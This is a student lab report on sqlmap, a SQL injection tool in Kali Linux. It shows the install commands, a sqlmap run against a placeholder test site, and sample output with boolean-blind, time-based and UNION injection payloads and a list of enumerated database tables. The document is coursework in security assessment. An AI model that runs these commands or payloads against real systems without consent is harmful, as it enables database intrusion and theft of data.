EXPERIMENT NO: 6

Aim:-: Study of Database Assessment Tools in Kali Linux.

Sqlmap

Sqlmap Package Description:

Sqlmap is a python based tool, which means it will usually run on any system with python. However, we like Linux and specifically Ubuntu, it simply makes it easy to get stuff done. Python comes already installed in Ubuntu. This is the same tool we use on our online sql injection test site.

To get started with sqlmap, it is a matter of downloading the tool, unpacking it, and running the command with the necessary options. As there may be Windows users amongst you, I'll first start with how to get an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system, even if the thought of Linux sends shivering spasms of fear. Who knows, you may even like it.

Installation:

elliot@evilcorp:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Cloning into 'sqlmap-dev'...

remote: Counting objects: 633, done.

remote: Compressing objects: 100% (602/602), done.

remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0

Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done.

Resolving deltas: 100% (170/170), done.

Sqlmap Usage Example:

elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables

___

__H__

___ ___[']_____ ___ ___ {1.5.2.12#dev}

|_ -| . ['] | .'| . |

|___|_ ["]_|_|_|__,| _|

|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'

[12:59:04] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 9561=9561

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1 AND SLEEP(5)

Type: UNION query

Title: Generic UNION query (NULL) - 3 columns

Payload: ud=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj

---

[12:59:05] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10

back-end DBMS: MySQL >= 5.0.12

Database: books

[8 tables]

+---------------------------------------+

| author |

| shoppingcarts |

| categories |

| featured |

| guestbook |

| pictures |

| products |

| users |

+---------------------------------------+

Database: information_schema

[28 tables] == snipped ==

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com'

[*] shutting down at 12:59:21

References:

1. https://tools.kali.org/vulnerability-analysis/sqlmap

2. https://sqlmap.org/

3. https://www.youtube.com/watch?v=QsMkQMKsIII

4. https://www.tutorialspoint.com/kali_linux/index.htm

Submitted By: Anup Sanjay Patil Guided by: Prof. Girish k. Patnaik